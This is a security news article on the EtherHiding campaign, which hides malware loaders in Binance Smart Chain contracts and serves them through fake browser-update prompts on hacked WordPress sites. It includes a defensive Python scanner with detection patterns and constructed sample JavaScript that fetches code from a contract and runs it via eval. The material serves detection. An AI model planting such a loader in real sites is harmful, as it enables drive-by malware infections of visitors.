Threat actors have been seen using Binance’s Smart Chain (BSC) contracts to deliver malicious code in what has been called the “next level of bulletproof hosting.”
Guardio Labs has given the campaign, which it discovered two months ago, the codename EtherHiding.
The new twist represents the most recent iteration of an ongoing malware campaign that leverages compromised WordPress sites to serve unsuspecting visitors a fake warning to update their browsers before the sites can be accessed, ultimately leading to the deployment of information stealer malware such as Amadey, Lumma, or RedLine.
“While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they’ve quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain,” security researchers Nati Tal and Oleg Zaytsev said.
“This campaign is up and harder than ever to detect and take down.”
Threat actors are known to target WordPress sites both through malicious plugins and by exploiting publicly disclosed security flaws in popular plugins to breach websites, which gives them the ability to completely hijack infected websites at will.
The most recent attacks inject obfuscated JavaScript into the infected sites that is designed to query the BNB Smart Chain by creating a smart contract with an attacker-controlled blockchain address.
The objective is to retrieve a second-stage script from a command-and-control (C2) server that, in turn, retrieves a third-stage payload to serve the false browser update notices.
If a victim clicks the update button on the fake overlay, they are redirected to Dropbox or another trustworthy file hosting service where they can download a malicious executable.
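A defender auditing a WordPress install can look for the combination the chain above relies on: script that talks to a BNB Smart Chain RPC endpoint, reads from a contract at a fixed address, and executes whatever comes back. The following scanner is an added example, not code from Guardio Labs or the page; the RPC hostname pattern, library names and sample snippets are assumptions constructed for illustration, and it also decodes long base64 string literals so simple string hiding does not defeat the match.

```python
import base64
import re
from pathlib import Path

# Indicator patterns are assumptions made for this example (the page names none); tune them locally.
INDICATORS = {
    "bsc_rpc_host": re.compile(r"bsc-dataseed\d*\.binance\.org", re.I),
    "rpc_contract_read": re.compile(r"JsonRpcProvider|\beth_call\b|new\s+ethers\.Contract"),
    "hex_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "dynamic_exec": re.compile(r"\beval\s*\(|new\s+Function\s*\(|\batob\s*\("),
}
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{24,}={0,2})[\"']")


def _decoded_literals(text: str) -> str:
    """Return the decodings of long base64 string literals so hidden hostnames are still visible."""
    out = []
    for lit in B64_LITERAL.findall(text):
        try:
            out.append(base64.b64decode(lit, validate=True).decode("utf-8", "ignore"))
        except ValueError:  # binascii.Error is a ValueError; skip literals that are not base64
            continue
    return "\n".join(out)


def scan_text(text: str) -> dict:
    """Map each indicator name to the distinct matches found in the text or its decoded literals."""
    haystack = text + "\n" + _decoded_literals(text)
    return {name: sorted(set(rx.findall(haystack))) for name, rx in INDICATORS.items() if rx.search(haystack)}


def is_suspicious(text: str) -> bool:
    """Flag only the full pattern: a chain read, a contract address, and dynamic execution together."""
    hits = scan_text(text)
    chain_read = "bsc_rpc_host" in hits or "rpc_contract_read" in hits
    return chain_read and "hex_address" in hits and "dynamic_exec" in hits


def scan_tree(root: Path) -> list:
    """Walk a WordPress tree (themes, plugins, uploads) and return flagged files with their hits."""
    flagged = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".js", ".html"}:
            text = path.read_text(errors="ignore")
            if is_suspicious(text):
                flagged.append((str(path), scan_text(text)))
    return flagged


# Constructed samples for illustration: a benign theme script and an injected loader shape.
BENIGN = 'jQuery(function(){ fetch("/wp-json/wp/v2/posts").then(r=>r.json()); });'
INJECTED = ('(async()=>{const p=new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org");'
            'const c=new ethers.Contract("0x' + "ab" * 20 + '",["function get() view returns (string)"],p);'
            'eval(atob(await c.get()));})();')
HIDDEN = INJECTED.replace('"https://bsc-dataseed1.binance.org"',
                          'atob("' + base64.b64encode(b"https://bsc-dataseed1.binance.org").decode() + '")')
```

Legitimate dApp front ends also talk to BSC, so treat a hit as a lead to inspect, and compare flagged files against a clean copy of the theme or plugin.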
There is currently no way to intervene and break up the attack chain, even though the address and the associated contract have been flagged as being used in a phishing scheme, because they are hosted on a decentralized service.
“As this is not a username or password used in any financial issues or other activity that those targeted can be pulled to give funds or other kinds of proprietary information to — visitors of damaged WordPress pages don’t have a clue as to what really goes on under the hood,” the investigators stated.
“This contract, tagged as fake, ill-gotten, or whatnot, is still online and delivers the malicious payload.”
Known as ClearFake, the larger campaign was described in more detail by Sekoia as a “JavaScript arrangement deployed on hacked websites in order to provide further malware utilizing the drive-by download technique.”
The French cybersecurity company claims that the attack chains have been seen to result in the launch of malware loaders known as IDAT Loader and HijackLoader, which serve as a launchpad for various trojans and commodity stealers like DanaBot, Lumma, Raccoon, RedLine, Remcos, SystemBC, and Vidar.
“Based on the code similarities between IDAT Loader and HijackLoader, and given the overlap in the C2 infrastructures, […] the same threat group operates both loaders,” it said, noting that there are tactical overlaps between ClearFake and SocGholish, raising the possibility that the two malware families are maintained by one actor.
SocGholish, also called FakeUpdates, refers to a persistent threat that involves tricking users into downloading JavaScript-based malware under the guise of web browser updates.
With plugins becoming a sizable attack surface for WordPress, it’s recommended that users relying on the content management system (CMS) adhere to security best practices and keep their systems up-to-date with the latest patches, remove unwanted admin users, and enforce strong passwords.